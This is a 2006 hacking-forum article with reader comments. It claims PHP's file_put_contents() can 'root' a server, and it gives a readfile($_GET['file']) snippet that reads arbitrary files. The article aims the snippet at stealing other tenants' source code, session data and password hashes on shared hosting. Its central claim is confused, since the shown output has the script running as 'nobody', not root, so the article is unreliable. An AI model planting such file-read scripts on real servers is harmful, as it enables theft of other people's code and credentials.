Follow us on Twitter!
Don't judge the unknown - Grindordie
Thursday, April 17, 2014
Navigation
Home
HellBoundHackers Main:
HellBoundHackers Find:
HellBoundHackers Information:
Learn
Communicate
Submit
Shop
Challenges
HellBoundHackers Exploit:
HellBoundHackers Programming:
HellBoundHackers Think:
HellBoundHackers Track:
HellBoundHackers Patch:
HellBoundHackers Other:
HellBoundHackers Need Help?
Other
Members Online
Total Online: 20
Guests Online: 18
Members Online: 2

Registered Members: 82818
Newest Member: Ahmed
Latest Articles

Rooting with php

Arrow Image Use the PHP file_put_contents() function to gain root.



This is no hacking technique or something but it could help you in some cases.

I suppose many of you know of the php function file_put_contents(). You can easily create a file with this. But what porbably most of you won\'t know is that you can also create php scripts with this function that run under the root account of your apache server.


Let\'s begin shall we.

We got the following script:

<?php

$filename = \"evilscript.php\";
$scriptcontent = \"<?php

//script code goes here

?>\";

file_put_contents($filename, $scriptcontent);

?>

This will create the following script:

<?php

//script code goes here

?>

Because the web server creates this script, it is owned by the web and when we examine the file better we\'ll see the following:

$ ls evilscript.php
-rw-r--r-- 1 nobody nobody xx Jan 1 00:00 evilscript.php

Apache usually runs as the user nobody for the record ;)

Because the script is owned by the web server it can edit eveything on it. The safe_mode directive in php does NOT offer protection for this behavior.

If this script has content to read e.g. the session data of another site stored on the server then you could read and modify everything! This is surely a risc in a shared hosting setup. You could also make a shell of the script and get root on the web server.

Another big risc is that you can easily get the source code of scripts stored on the server that aren\'t yours. Here\'s an example:

<?php

header(\'Content-Type: text/plain\');
readfile($_GET[\'file\']);

?>

If I would specify to be for example admin.php or something like that then I would simply get the source of that file. And if it contains e.g. passwordhashes or something... I don\'t need to draw a picture with it do I ;)

I hope you\'ve learned something of this article and find it useful.

- The_Cell

Comments

mastergameron July 28 2006 - 16:36:01
I tried this and it dosen't seem to work. I put:
Code
<?php $filename="filereadingscript.php"; $contents="<?php header('Content-Type: text/plain'Wink; readfile(index.php); ?>"; file_put_contents($filename, $contents); ?>


Into a script, and the script that it creates just shows: "<br /> <b>Warning</b>: readfile() [<a href='function.readfile'>function.readfile</a>]: Unable to access indexphp in <b>/path/was/hidden/filereadingscript.php</b> on line <b>1</b><br /> <br /> <b>Warning</b>: readfile(indexphp) [<a href='function.readfile'>function.readfile</a>]: failed to open stream: Invalid argument in <b>/path/was/hidden/filereadingscript.php</b> on line <b>1</b><br />"
mastergameron July 28 2006 - 20:08:32
I tried it on my localhost apache server with and without the quotes and it still dosen't work. It still gives the same error. I am running Windows XP (unfortunatly) with Apache 2.2.2 and PHP 5.2.0-dev. Maybe this just dosen't work on Windows......
The_Cellon July 29 2006 - 14:27:00
@Grindordie: Yeah I know sorry. nobody is the username of apache. This technique bypasses alot of the safeguards that the safe_mode directive provides. @mastergamer: try VMware Player with a vmx file of Suse or another linux distro. You can emulate linux this way on your windows box Wink
beetlefluxon July 31 2006 - 15:53:01
Wtf is the point with this article? You can talk about php shells as much as you want but how are you going to get the code on the server? You don't say a word about that. So this article is useless.
The_Cellon August 01 2006 - 20:09:21
I quote myself "another site stored on the server". I thought it would be opbvious that I'm talking about a shared hosting environment where you have a site on the server and to get other people's source etc. If my article was useless it wouldn't get approved and then your comment would be even more contructive...
Uber0non April 24 2007 - 13:07:50
Great article B) and also lol@beetleflux
Post Comment

Sorry.

You must have completed the challenge Basic 1 and have 100 points or more, to be able to post.